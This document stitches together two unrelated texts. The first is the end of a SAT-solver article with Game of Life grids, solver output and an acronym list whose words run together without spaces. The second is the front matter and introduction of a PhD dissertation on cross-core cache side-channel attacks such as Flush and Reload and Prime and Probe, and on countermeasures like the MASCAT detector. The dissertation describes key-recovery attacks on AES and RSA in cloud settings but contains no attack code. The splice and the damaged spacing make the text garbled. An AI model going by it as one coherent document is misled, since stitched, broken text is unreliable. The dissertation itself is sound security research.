.*.*.**....****.*..*
..*.*....*.*..*..**.
....*.****..*..*.*..
....**....*.*.**..*.
*.**...****.*..*.**.
**...**.....**.*....
...**..*.***..*.**.*
***.*..*.*..*.*.*.**
*.......*..**.**....
2.rle written
...
Let’strymoredense,onemandatory truecellpereach4-cellchunk:
61133 clauses
.**.**...*....**..**
*.*.*...*.*..*..*..*
*....*...*.*..*.**..
.***.*.....*.**.*...
..*.*.....**...*..*.
*......**..*...*.**.
**.....*...*.**.*...
...**...*...**..*...
**.*..*.*......*...*
.*...**.**..***.****
.*....*.*..*..*.*...
**.***...*.**...*.**
.*.*..****.....*..*.
*....*.....**..**.*.
*.***.*..**.*.....**
.*...*..*......**...
...*.*.**......*.***
..**.*.....**......*
*..*.*.**..*.*..***.
**....*.*...*...*...
1.rle written
61139 clauses
.**.**...*....**..**
146
*.*.*...*.*..*..*..*
*....*...*.*..*.**..
.***.*.....*.**.*...
..*.*.....**...*..*.
*......**..*...*.**.
**.....*...*.**.*...
...**...*...**..*...
**.*..*.*......*...*
.*...**.**..***.****
.*....*.*..*..*.*...
**.***...*.**...*.**
.*.*..****.....*..*.
*....*.....**..**.*.
*.***.*..**.*.....**
.*...*..*......**..*
...*.*.**......*.**.
..**.*.....**....*..
*..*.*.**..*.*...*.*
**....*.*...*.....**
2.rle written
...
...andevenmore: onecellpereach3-cellchunk:
61166 clauses
**.*..**...**.**....
*.**..*.*...*.*.*.**
....**..*...*...*.*.
.**..*.*.**.*.*.*.*.
..**.*.*...*.**.*.**
*...*.*.**.*....*.*.
**.*..*...*.*.***..*
.*.*.*.***..**...**.
.*.*.*.*..**...*.*..
**.**.*..*...**.*..*
..*...*.**.**.*.*.**
..*.**.*..*.*.*.*...
**.*.*...*..*.*.*...
.*.*...*.**..*..***.
.*..****.*....**...*
..*.*...*..*...*..*.
.**...*.*.**...*.*..
..*..**.*.*...**.**.
..*.*..*..*..*..*..*
.**.**....**..**..**
1.rle written
61172 clauses
**.*..**...**.**....
*.**..*.*...*.*.*.**
....**..*...*...*.*.
.**..*.*.**.*.*.*.*.
..**.*.*...*.**.*.**
*...*.*.**.*....*.*.
**.*..*...*.*.***..*
.*.*.*.***..**...**.
.*.*.*.*..**...*.*..
**.**.*..*...**.*..*
..*...*.**.**.*.*.**
..*.**.*..*.*.*.*...
**.*.*...*..*.*.*...
.*.*...*.**..*..***.
.*..****.*....**...*
..*.*...*..*...*..*.
.**..**.*.**...*.*..
*..*.*..*.*...**.**.
*..*.*.*..*..*..*..*
.**...*...**..**..**
2.rle written
...
Thisismostdense. Unfortunaly,it’simpossibletoconstruct“stilllife”withonemandatory truecellper
each2-cellchunk.
147
11.4.3 The source code
SourcecodeandWolframMathematicanotebook: https://github.com/dennis714/SAT_SMT_article/tree/
master/SAT/GoL .
12 Acronyms used
CNFConjunctivenormalform....................................................................................... 3
DNFDisjunctivenormalform..................................................................................... 124
DSLDomain-specificlanguage...................................................................................... 4
CPRNGCryptographicallySecurePseudorandomNumberGenerator......................................... 20
SMTSatisfiabilitymodulotheories................................................................................. 1
SATBooleansatisfiabilityproblem.................................................................................. 1
LCGLinearcongruentialgenerator................................................................................. 1
PLProgrammingLanguage.......................................................................................... 4
OOPObject-orientedprogramming............................................................................... 40
SSAStaticsingleassignmentform................................................................................ 32
CPUCentralprocessingunit....................................................................................... 35
FPUFloating-pointunit............................................................................................. 60
PRNGPseudorandomnumbergenerator......................................................................... 70
CRTCruntimelibrary.............................................................................................. 70
CRCCyclicredundancycheck..................................................................................... 67
ASTAbstractsyntaxtree........................................................................................... 41
AKAAlsoKnownAs.................................................................................................. 1
CTFCapturetheFlag............................................................................................. 114
ISAInstructionSetArchitecture................................................................................... 35
CSPConstraintsatisfactionproblem............................................................................... 6
148
CSComputerscience................................................................................................ 3
DAGDirectedacyclicgraph........................................................................................ 30
NOPNoOperation.................................................................................................. 39
JVMJavaVirtualMachine........................................................................................... 60
VMVirtualMachine................................................................................................. 73
LZSSLempel–Ziv–Storer–Szymanski.............................................................................. 99
RAMRandom-accessmemory................................................................................... 100
FPGAField-programmablegatearray........................................................................... 116
EDAElectronicdesignautomation............................................................................... 116
MACMessageauthenticationcode.............................................................................. 116
ECCEllipticcurvecryptography.................................................................................. 116
APIApplicationprogramminginterface............................................................................ 5
NSANationalSecurityAgency..................................................................................... 20
149Cross-core Microarchitectural Side Channel Attacks and
Countermeasures
by
Gorka Irazoqui
A Dissertation
Submitted to the Faculty
of the
WORCESTER POLYTECHNIC INSTITUTE
In partial fulfillment of the requirements for the
Degree of Doctor of Philosophy
in
Electrical and Computer Engineering
by
April 2017
APPROVED:
Professor Thomas Eisenbarth Professor Berk Sunar
Dissertation Advisor Dissertation Committee
ECE Department ECE Department
Professor Craig Shue Professor Engın Kirda
Dissertation Committee Dissertation Committee
CS Department Northeastern University
Abstract
In the last decade, multi-threaded systems and resource sharing have brought a
number of technologies that facilitate our daily tasks in a way we never imagined.
Among others, cloud computing has emerged to offer us powerful computational
resources without having to physically acquire and install them, while smartphones
have almost acquired the same importance desktop computers had a decade ago.
This has only been possible thanks to the ever evolving performance optimization
improvements made to modern microarchitectures that efficiently manage concur-
rent usage of hardware resources. One of the aforementioned optimizations is the
usage of shared Last Level Caches (LLCs) to balance different CPU core loads and
to maintain coherency between shared memory blocks utilized by different cores.
The latter for instance has enabled concurrent execution of several processes in low
RAM devices such as smartphones.
Although efficient hardware resource sharing has become the de-facto model for
several modern technologies, it also poses a major concern with respect to security.
Some of the concurrently executed co-resident processes might in fact be malicious
and try to take advantage of hardware proximity. New technologies usually claim to
be secure by implementing sandboxing techniques and executing processes in isolated
software environments, called Virtual Machines (VMs). However, the design of these
isolated environments aims at preventing pure software-based attacks and usually
does not consider hardware leakages. In fact, the malicious utilization of hardware
resources as covert channels might have severe consequences to the privacy of the
customers.
Our work demonstrates that malicious customers of such technologies can utilize
the LLC as the covert channel to obtain sensitive information from a co-resident
victim. We show that the LLC is an attractive resource to be targeted by attackers,
as it offers high resolution and, unlike previous microarchitectural attacks, does not
require core-colocation. Particularly concerning are the cases in which cryptography
is compromised, as it is the main component of every security solution. In this
sense, the presented work does not only introduce three attack variants that can
be applicable in different scenarios, but also demonstrates the ability to recover
cryptographic keys (e.g. AES and RSA) and TLS session messages across VMs,
bypassing sandboxing techniques.
Finally, two countermeasures to prevent microarchitectural attacks in general
and LLC attacks in particular from retrieving fine-grain information are presented.
Unlike previously proposed countermeasures, ours do not add permanent overheads
in the system but can be utilized as preemptive defenses. The first identifies leakages
in cryptographic software that can potentially lead to key extraction, and thus, can
be utilized by cryptographic code designers to ensure the sanity of their libraries
before deployment. The second detects microarchitectural attacks embedded into
innocent-looking binaries, preventing them from being posted in official application
repositories that usually have the full trust of the customer.
2
Acknowledgements
The attacks described in Chapter 4 are based on collaborative work with Mehmet
Sinan  ̇Inci and resulted in peer-reviewed publications [IIES14b, IIES15].
The content presented in Chapter 5 has been published as [IES16].
Parts of the results introduced in Chapter 6 are based joint work with Mehmet
Sinan  ̇Inci and Berk Gulmezoglu and resulted in publication [  ̇IGI+16a]. The rest of
the content of Chapter 6 has been published in [IES15a, IES15b]
The vulnerability analysis described in Chapter 7 was performed jointly with
Intel employes Xiaofei Guo, Hareesh Khattri, Arun Kanuparthi and Kai Cong, and
it is under submission for a peer-review venue. The remaining contributions in the
chapter have also been submitted to a peer-review conference.
This work was supported by the National Science Foundation (NSF), under
grants CNS-1318919, CNS-1314770 and CNS-1618837.
This thesis is the result of several years of effort that would not have been
successful without the collaboration, both in a professional and personal way, of
certain people to whom I would like to express my gratitude.
My two advisors Thomas Eisenbarth and Berk Sunar have given me confidence
and freedom to achieve the results presented in this thesis. Without their knowledge,
advise and personal treatment this journey would have been much more complicated.
They were able to take the best out of my skills, and sometimes even believed in
me more than I did. I will always feel that part of the achievements that I will
accomplish during my career will belong to them.
As part of this thesis I had the chance of working closely to Yuval Yarom and
Xiaofei Guo. Besides the pleasure that it was working with them, with both of them
I established a relationship that goes beyond our professional collaborations. I wish
them the best of the lucks in both their professional careers and their personal lives.
I would like to thank the members of the Vernam lab, for being such a great
support in the most difficult moments. Every single person in the lab was helpful
at some specific point during the last 4 years. I am looking forward to maintain the
good relationships we built in the upcoming years.
I also would like to express my gratitude to the One United and E soccer team
members, who gave me the distraction that every person needs to accomplish profes-
sional success. Besides the three tournaments that we won together, they provided
me an invaluable personal support which produced friendship relationships that I
will never forget. They can feel proud of being one of the most positive things I
take from this experience.
My parents and my sister have always been the first ones believing in me, and
have a great influence in any success I achieve in my personal career. Although they
already know what they mean to me, I would still like to thank them for everything
they do to take always the best of me. I cannot imagine a better source of strength
for the upcoming challenges.
i
Finally, I would like to thank Elena Gonzalez for being the best person I could
ever find to stay by my side. Despite all the obstacles she never gave up on us. I will
always be in debt with her for all the support she gave me to complete this thesis.
She has shown me personal values that I hardly find in other people, and that I am
willing to enjoy everyday from now on.
ii
Contents
1 Introduction 1
2 Background 6
2.1 Side Channel Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.2 Computer Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.1 Hardware Caches . . . . . . . . . . . . . . . . . . . . . . . . . 8
2.3 The Cache as a Covert Channel . . . . . . . . . . . . . . . . . . . . . 11
2.3.1 The Evict and Time attack . . . . . . . . . . . . . . . . . . . 11
2.3.2 The Prime and Probe Attack . . . . . . . . . . . . . . . . . . 13
2.4 Funcionality of Commonly Used Cryptographic Algorithms . . . . . . 13
2.4.1 AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.4.2 RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.4.3 Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . 19
3 Related Work 21
3.1 Classical Side Channel Attacks . . . . . . . . . . . . . . . . . . . . . 21
3.1.1 Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . 21
3.1.2 Power Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
3.2 Microarchitectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . 23
3.2.1 Hyper-threading . . . . . . . . . . . . . . . . . . . . . . . . . 24
iii
3.2.2 Branch Prediction Unit Attacks . . . . . . . . . . . . . . . . . 24
3.2.3 Out-of-order Execution Attacks . . . . . . . . . . . . . . . . . 25
3.2.4 Performance Monitoring Units . . . . . . . . . . . . . . . . . . 26
3.2.5 Special Instructions . . . . . . . . . . . . . . . . . . . . . . . . 26
3.2.6 Hardware Caches . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.2.7 Cache Internals . . . . . . . . . . . . . . . . . . . . . . . . . . 28
3.2.8 Cache Pre-Fetching . . . . . . . . . . . . . . . . . . . . . . . . 29
3.2.9 Other Attacks on Caches . . . . . . . . . . . . . . . . . . . . . 29
3.2.10 Memory Bus Locking Attacks . . . . . . . . . . . . . . . . . . 30
3.2.11 DRAM and Rowhammer Attacks . . . . . . . . . . . . . . . . 30
3.2.12 TEE Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.2.13 Cross-core/-CPU Attacks . . . . . . . . . . . . . . . . . . . . 32
4 The Flush and Reload attack 34
4.1 Flush and Reload Requirements . . . . . . . . . . . . . . . . . . . . . 35
4.2 Memory Deduplication . . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.3 Flush and Reload Functionality . . . . . . . . . . . . . . . . . . . . . 37
4.4 Flush and Reload Attacking AES . . . . . . . . . . . . . . . . . . . . 39
4.4.1 Description of the Attack . . . . . . . . . . . . . . . . . . . . . 40
4.4.2 Recovering the Full Key . . . . . . . . . . . . . . . . . . . . . 42
4.4.3 Attack Scenario 1: Spy Process . . . . . . . . . . . . . . . . . 44
4.4.4 Attack Scenario 2: Cross-VM Attack . . . . . . . . . . . . . . 45
4.4.5 Experiment Setup and Results . . . . . . . . . . . . . . . . . . 45
4.4.6 Comparison to Other Attacks . . . . . . . . . . . . . . . . . . 47
4.5 Flush and Reload Attacking Transport Layer Security: Re-viving the
Lucky 13 Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.5.1 The TLS Record Protocol . . . . . . . . . . . . . . . . . . . . 49
iv
4.5.2 HMAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
4.5.3 CBC Encryption & Padding . . . . . . . . . . . . . . . . . . . 51
4.5.4 An Attack On CBC Encryption . . . . . . . . . . . . . . . . . 51
4.5.5 Analysis of Lucky 13 Patches . . . . . . . . . . . . . . . . . . 52
4.5.6 Patches Immune to Flush and Reload . . . . . . . . . . . . . . 53
4.5.7 Patches Vulnerable to Flush and Reload . . . . . . . . . . . . 53
4.5.8 Reviving Lucky 13 on the Cloud . . . . . . . . . . . . . . . . . 55
4.5.9 Experiment Setup and Results . . . . . . . . . . . . . . . . . . 59
4.6 Flush and Reload Outcomes . . . . . . . . . . . . . . . . . . . . . . . 62
5 The First Cross-CPU Attack: Invalidate and Transfer 64
5.1 Cache Coherence Protocols . . . . . . . . . . . . . . . . . . . . . . . . 65
5.1.1 AMD HyperTransport Technology . . . . . . . . . . . . . . . . 67
5.1.2 Intel QuickPath Interconnect Technology . . . . . . . . . . . . 68
5.2 Invalidate and Transfer Attack Procedure . . . . . . . . . . . . . . . 69
5.3 Exploiting the New Covert Channel . . . . . . . . . . . . . . . . . . . 71
5.3.1 Attacking Table Based AES . . . . . . . . . . . . . . . . . . . 72
5.3.2 Attacking Square and Multiply El Gamal Decryption . . . . . 72
5.4 Experiment Setup and Results . . . . . . . . . . . . . . . . . . . . . . 73
5.4.1 Experiment Setup . . . . . . . . . . . . . . . . . . . . . . . . . 74
5.4.2 AES Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
5.4.3 El Gamal Results . . . . . . . . . . . . . . . . . . . . . . . . . 76
5.5 Invalidate and Transfer Outcomes . . . . . . . . . . . . . . . . . . . . 79
6 The Prime and Probe Attack 80
6.1 Virtual Address Translation and Cache Addressing . . . . . . . . . . 80
6.2 Last Level Cache Slices . . . . . . . . . . . . . . . . . . . . . . . . . . 82
v
6.3 The Original Prime and Probe Technique . . . . . . . . . . . . . . . . 83
6.4 Limitations of the Original Prime and Probe Technique . . . . . . . . 84
6.5 Targeting Small Pieces of the LLC . . . . . . . . . . . . . . . . . . . 85
6.6 LLC Set Location Information Enabled by Huge Pages . . . . . . . . 85
6.7 Reverse Engineering the Slice Selection Algorithm . . . . . . . . . . . 87
6.7.1 Probing the Last Level Cache . . . . . . . . . . . . . . . . . . 88
6.7.2 Identifying mData Blocks Co-Residing in a Slice . . . . . . . 88
6.7.3 Generating Equations Mapping the Slices . . . . . . . . . . . . 89
6.7.4 Recovering Linear Hash Functions . . . . . . . . . . . . . . . . 91
6.7.5 Experiment Setup for Linear Hash Functions . . . . . . . . . . 92
6.7.6 Results for Linear Hash Functions . . . . . . . . . . . . . . . . 93
6.7.7 Obtaining Non-linear Slice Selection Algorithms . . . . . . . 95
6.8 The LLC Prime and Probe Attack Procedure . . . . . . . . . . . . . 98
6.8.1 Prime and Probe Applied to AES . . . . . . . . . . . . . . . . 99
6.8.2 Experiment Setup and Results for the AES Attack . . . . . . 101
6.9 Recovering RSA Keys in Amazon EC2 . . . . . . . . . . . . . . . . . 105
6.10 Prime and Probe Outcomes . . . . . . . . . . . . . . . . . . . . . . . 114
7 Countermeasures 116
7.1 Existing Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . 117
7.1.1 Page Coloring . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
7.1.2 Performance Event Monitorization to Detect Cache Attacks . 118
7.2 Problems with Previously Existing Countermeasures . . . . . . . . . 119
7.3 Detecting Cache Leakages at the Source Code . . . . . . . . . . . . . 120
7.3.1 Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
7.3.2 Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
7.3.3 Evaluated Crypto Primitives . . . . . . . . . . . . . . . . . . 130
vi
7.3.4 Cryptographic Libraries Evaluated . . . . . . . . . . . . . . . 135
7.3.5 Results for AES . . . . . . . . . . . . . . . . . . . . . . . . . . 135
7.3.6 Results for RSA . . . . . . . . . . . . . . . . . . . . . . . . . . 137
7.3.7 Results for ECC . . . . . . . . . . . . . . . . . . . . . . . . . . 140
7.3.8 Leakage Summary . . . . . . . . . . . . . . . . . . . . . . . . 143
7.3.9 Comparison with Related Work . . . . . . . . . . . . . . . . . 143
7.3.10 Recommendations to Avoid Leakages in Cryptographic Software145
7.3.11 Outcomes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
7.4 MASCAT : Preventing Microarchitectural Attacks from Being Executed147
7.4.1 Microarchitectural Attacks . . . . . . . . . . . . . . . . . . . . 149
7.4.2 Implicit Characteristics of Microarchitectural Attacks . . . . . 152
7.4.3 Our Approach: MASCAT a Static Analysis Tool for Microar-
chitectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . 154
7.4.4 Experiment Setup . . . . . . . . . . . . . . . . . . . . . . . . . 160
7.5 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
7.5.1 Analysis of Microarchitectural Attacks . . . . . . . . . . . . . 161
7.5.2 Results for Benign Binaries . . . . . . . . . . . . . . . . . . . 161
7.5.3 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
7.5.4 Outcomes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
8 Conclusion 166
vii
List of Figures
1.1 Hardware attacks bypass VM isolation . . . . . . . . . . . . . . . . . 3
2.1 Side channel attack scenario . . . . . . . . . . . . . . . . . . . . . . . 7
2.2 Typical microarchitecture layout in modern processors . . . . . . . . 8
2.3 Cache access time distribution . . . . . . . . . . . . . . . . . . . . . . 9
2.4 Evict and Time procedure . . . . . . . . . . . . . . . . . . . . . . . . 12
2.5 Prime and Probe procedure . . . . . . . . . . . . . . . . . . . . . . . 14
2.6 AES 128 state diagram with respect to its 4 main operations . . . . . 15
2.7 Last round of a T-table implementation of AES . . . . . . . . . . . . 16
2.8 ECC elliptic curve in which R=P+Q . . . . . . . . . . . . . . . . . . 19
2.9 ECDH procedure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
4.1 Memory Deduplication Feature . . . . . . . . . . . . . . . . . . . . . 37
4.2 Copy-on-Write Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . 38
4.3 Flush and Reload access time distinction . . . . . . . . . . . . . . . . 39
4.4 Flush and Reload results for AES . . . . . . . . . . . . . . . . . . . . 47
4.5 CBC mode TLS functionality . . . . . . . . . . . . . . . . . . . . . . 50
4.6 Network time difference with Lucky 13 patches . . . . . . . . . . . . . 56
4.7 Cache access times for Lucky 13 vulnerabilities . . . . . . . . . . . . . 57
4.8 Flush and Reload 2 byte results for PolarSSL Lucky 13 vulnerability . 60
viii
4.9 Flush and Reload 1 byte results for PolarSSL Lucky 13 vulnerability . 61
4.10 Flush and Reload 1 byte results for CyaSSL Lucky 13 vulnerability . . 62
4.11 Flush and Reload 1 byte results for GnuTLS Lucky 13 vulnerability . 63
5.1 DRAM accesses vs Directed probes thanks to the HyperTransport
Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
5.2 HT link vs DRAM access . . . . . . . . . . . . . . . . . . . . . . . . . 69
5.3 HT and DRAM time access difference in AMD . . . . . . . . . . . . . 70
5.4 IQP and DRAM time access difference in Intel . . . . . . . . . . . . . 71
5.5 Miss counter values for each ciphertext value, normalized to the average 75
5.6 Invalidate and Transfer key finding step . . . . . . . . . . . . . . . . 76
5.7 Encryptions to recover the AES key with Invalidate and Transfer . . 76
5.8 RSA decryption trace observed with Invalidate and Transfer . . . . . 77
5.9 Key recovery step for a Invalidate and Transfer RSA trace . . . . . . 78
6.1 A hash function based on the physical address decides whether the
memory block belongs to slice 0 or 1. . . . . . . . . . . . . . . . . . . 83
6.2 Slice Last level cache addressing methodology for Intel processors . . 84
6.3 4KB vs 2MB offset information comparison . . . . . . . . . . . . . . . 86
6.4 Slice colliding memory block generation: Step 1 . . . . . . . . . . . . 89
6.5 Slice colliding memory block generation: Step 2 . . . . . . . . . . . . 90
6.6 Slice colliding memory block generation: Step 3 . . . . . . . . . . . . 91
6.7 Slice access distribution in Intel Xeon E5-2670 v2 . . . . . . . . . . . 96
6.8 Prime and Probe probing cache vs memory time histogram . . . . . . 98
6.9 T-table set identification step with Prime and Probe . . . . . . . . . 102
6.10 Table cache line access distribution per ciphertext byte . . . . . . . . 103
6.11 Results for AES key recovery with Prime and Probe . . . . . . . . . . 104
ix
6.12 RSA trace identification step with Prime and Probe . . . . . . . . . . 109
6.13 RSA multiplicant recovery and aligment with Prime and Probe . . . . 110
6.14 Comparison of the final obtained peaks with the correct peaks with
adjusted timeslot resolution . . . . . . . . . . . . . . . . . . . . . . . 111
7.1 Page coloring implementation . . . . . . . . . . . . . . . . . . . . . . 118
7.2 HPC as a cache attack monitoring unit . . . . . . . . . . . . . . . . . 119
7.3 Vulnerable code snippet example . . . . . . . . . . . . . . . . . . . . 124
7.4 Code snippet wrapped in cache tracer . . . . . . . . . . . . . . . . . . 125
7.5 Results for cache traces obtained from toy example . . . . . . . . . . 125
7.6 Taint analysis example . . . . . . . . . . . . . . . . . . . . . . . . . . 128
7.7 Noise threshold adjustment . . . . . . . . . . . . . . . . . . . . . . . 130
7.8 First and Last round of an AES encryption . . . . . . . . . . . . . . . 131
7.9 WolfSSL and NSS AES leakage . . . . . . . . . . . . . . . . . . . . . 136
7.10 OpenSSL and Libgcrypt AES leakage . . . . . . . . . . . . . . . . . . 136
7.11 Montgomery ladder RSA leakage for WolfSSL . . . . . . . . . . . . . 137
7.12 Sliding window RSA leakage for a) WolfSSL and b) MbedTLS . . . . 137
7.13 Leakage for fixed window RSA in a) OpenSSL and b) IPP . . . . . . 138
7.14 Varying leakage due to cache missalignment explanation . . . . . . . 139
7.15 Montgomery Ladder ECC leakage for a) WolfSSL and b) Libgcrypt . 141
7.16 Sliding window ECC leakage in WolfSSL . . . . . . . . . . . . . . . . 142
7.17 ECC leakage in MbedTLS and Bouncy Castle . . . . . . . . . . . . . 142
7.18 wNAF ECC OpenSSL results . . . . . . . . . . . . . . . . . . . . . . 143
7.19 Flush and Reload code snippet from [YF14] . . . . . . . . . . . . . . 150
7.20 Rowhammer code snippet from [KDK+14a] . . . . . . . . . . . . . . . 151
7.21 Attribute analysis and threat score update implemented by MASCAT . 157
x
7.22 Visual example output of MASCAT , in which a flush and reload attack
is detected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
xi
List of Tables
3.1 Side channel attack classification according to utilized data analysis
method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
4.1 Comparison of cache side channel attack techniques against AES . . . 48
5.1 Summary of error results in the RSA key recovery attack . . . . . . . 78
6.1 Comparison of the profiled architectures . . . . . . . . . . . . . . . . 93
6.2 Slice selection hash function for the profiled architectures . . . . . . . 94
6.3 Hash selection algorithm implemented by the Intel Xeon E5-2670 v2 . 97
6.4 Successfully recovered peaks on average in an exponentiation . . . . . 111
7.1 Cryptographic libraries evaluated . . . . . . . . . . . . . . . . . . . . 135
7.2 Leakage summary for the cryptographic libraries. Default implemen-
tations are presented in bold . . . . . . . . . . . . . . . . . . . . . . . 144
7.3 Antivirus analysis output for microarchitectural attacks . . . . . . . . 155
7.4 Percentage of attacks correctly flagged by MASCAT (true positives). . 161
7.5 Results for different groups of binaries from Ubuntu Software Center. 162
7.6 Results for different groups of APKs. . . . . . . . . . . . . . . . . . . 163
xii
7.7 Explanation for benign binaries classified as threats. . . . . . . . . . . 163
xiii
Chapter 1
Introduction
The rapid increase in transistor densities over the past few decades brought numer-
ous computing applications, previously thought impossible, into the realm of every-
day computing. With dense integration and increased clock rates, heat dissipation
in single core architectures has become a major challenge for processor manufactur-
ers. The design of multi-core architectures has been the method of choice to profit
from further advances in integration, a solution that has shown to substantially
improve the performance over single-core architectures. Lately, the design of multi-
CPU sockets (each allocating multi-core systems) has taken even more advantage of
the benefits of having several Central Processing Units executing different tasks in
parallel.
Despite its many advantages, multi-core and multi-CPU architectures are sus-
ceptible to suffering under bandwidth bottlenecks if the architecture is not designed
properly, especially when more cores are packed into a high-performance system.
Parallelism can only be effective if shared resources are correctly managed, ensuring
their fair distribution. Several components have been designed and added to mod-
ern microarchitecture designs to achieve this goal. A good example are inclusive
Last Level Caches (LLCs), which are shared across multiple CPU cores and aid the
maintenance of cache coherency protocols within the same CPU socket by ensuring
that copies in the upper level caches exist in the LLC.
In fact, it is the aforementioned parallelism that has enabled many of the tech-
nologies we use in a daily basis. For instance, in the last decade we have witnessed
the cloud revolution, which allocates several customers (and their corresponding
workloads) in a single physical machine. The concurrent execution of these num-
ber of processes in the same computer would not be possible without the multi-
core/CPU designs that are common nowadays. Similarly, smartphones are now able
to execute several processes at the same time by running some of them in the back-
ground. This has been possible due to the large adoption that embedded devices
have done of multi-core architectures; modern smartphones not only have several
cores in the same device, but also they started allocating more than one CPU socket.
Although parallelism and resource sharing help to improve the performance,
1
they also poses a big risk when it comes to execute untrusted processes alongside
trusted processes. For example, a malicious attacker can take advantage of being
co-resident within a potential victim and execute malicious code in commercial
clouds. Similarly, a malicious application can try to steal sensitive information
from a benign security-critical application, e.g., an online banking application. To
cope with these issues both trusted and untrusted processes are usually executed in
a software isolated environment. IaaS clouds for instance rent expensive hardware
resource to multiple customers by offering guest OS instances sandboxed inside
virtualized machines (VMs). PaaS cloud services go one step further and allow
users to share the application space while sandboxed, e.g. using containers, at
the OS level. Similar sandboxing techniques are used to isolate semi-trusted apps
running on mobile devices. Even browsers use sandboxing to execute untrusted code
without the risk of harming the local host. All these mechanisms have a clear goal in
mind: taking advantage of resource sharing among several applications/users while
isolating each of them to prevent malicious exploitation of the said shared resources.
Despite the widespread adoption of the aforementioned technologies, the robust-
ness of the resource sharing scenarios that they provide have, prior to this work,
yet not being tested against malicious users exploiting hardware covert channels.
While the resistance of these technologies to pure software attacks is usually guar-
anteed, their response to hardware leakage based attacks still remains as an open
question. In the following we will refer to these attacks, which utilize hardware
resources like the cache and the Branch Prediction Unit (BPU) to gain information,
as microarchitectural attacks.
By 2014, only [RTSS09, ZJRR12] were able to succeed on recovering information
from co-resident users in realistics cloud environments utilizing microarchitectural
attacks the first recovers keystrokes across VMs in Amazon EC2, the latter recov-
ers an El Gamal decryption key in a lab virtualization environment. The problem
mostly comes from the fact that these and the rest of the works (except for [YF14])
prior to this thesis only consider core-private covert channels like the L1 cache and
the BPU. Therefore these attacks are only applicable when victim and attacker are
core co-resident. With multi-core systems being the de-facto architectures utilized
not only in high-end servers but also in smarpthone devices, the core co-residency
requirement significantly reduces the applicability of previously known microarchi-
tectural attacks. Further, constant optimization and penalty reduction make core-
private resources difficult to utilize with the amount of noise that regular workloads
introduce. For instance, L1 cache misses and L2 cache hits only differ by a few
cycles while misspredicted branches do not add substantial overhead. It is question-
able whether these covert channels would support the typical amount of noise in
sandboxed scenarios.
It is therefore necessary to investigate whether more powerful and applicable
covert channels can be utilized for unauthorized information extraction. For in-
stance, considering covert channels that do not require core co-location increments
the attack probabilities, as only CPU socket co-residency is needed. This becomes a
2
Figure 1.1: Malicious VMs can try to bypass the isolation provided by the hypervi-
sors and steal information from co-resident VMs
crucial fact in, e.g., commercial clouds where core co-residence is hardly unlikely. In
fact, several microarchitectural components are connected not only across cores but
also across CPU sockets. These include, among others, the Last Level Cache (LLC),
the memory bus or the DRAM. All these possible covert channels have to be thor-
oughly investigated to understand their capabilities and to develop the appropriate
countermeasures to prevent their utilization for information theft.
Contributions
This thesis focuses in one of the aforementioned potentially powerful covert chan-
nels, i.e., the LLC. We will show its exploitability under different assumptions and
scenarios. We present three attacks that can take advantage of such a resource,
namely Flush and Reload ,Invalidate and Transfer and Prime and Probe . The first
is only applicable across cores and under memory deduplication features, the second
is capable of reaching victims across CPU sockets under the same memory dedupli-
cation assumption, and the latter is able to recover information across cores without
any special requirement.
We show how and where these three attacks can be applied, specifically in sce-
narios where previous attacks had proven to behave poorly. For instance, we show
for the first time how to recover information across VMs located in different cores
with the Flush and Reload attack in VMware. Further, we show that these attacks
can be taken to multi CPU socket machines by applying the Invalidate and Transfer
attack in a 4 CPU socket school server. In addition, this thesis presents the LLC
Prime and Probe attack, applicable in any hypervisor without any special require-
ment (even VMware with updated security features). In fact, we utilize it to recover
a RSA key from a co-resident VM in Amazon EC2, demonstrating the big threat
that cache attacks pose in real world scenarios.
Lastly, we develop two tools that can help at preventing these leakages from
being exploited. However, unlike other proposed countermeasures that add perma-
3
nent performance overheads in the system that private companies do not want to
afford, our solutions take a preemptive approach. The first, aims at identifying LLC
leakages in cryptographic code to ensure they are caught before the software reaches
the end users. In particular, we use taint analysis, cache trace analysis and Mutual
Information (MI) to derive whether a cryptographic code leaks or not. We found
alarming results, as 50% of the implementations leaked information for AES, RSA
and ECC algorithms. The second tool, MASCAT , performs a different approach.
With official application stores like Google Play or Microsoft Store raising their
popularity, it is important that the binaries offered by these repositories are mal-
ware safe. Unlike regular malware, e.g. shell code, which might be easily detectable
by modern antivirus tools, microarchitectural attacks are different as they do not
look malicious. MASCAT serves as a microarchitectural attack antivirus, detecting
them inside binaries without having to inspect the source code manually.
Our work resulted in the discovery of several vulnerabilities in existing products
that attackers can take advantage from to steal information belonging to co-resident
victims. As part of our responsibility as researchers, we notified the corresponding
software designers about the vulnerabilities of their solutions. These conversations
lead to several security updates; VMware decided to implement a new salt-based
deduplication mechanism (CVE-2014-3566), Intel modified the RSA implementation
of its cryptographic library (CVE-2016-8100), the Bouncy Castle cryptographic li-
brary re-designed the AES implementation (2016-10003323) and WolfSSL closed
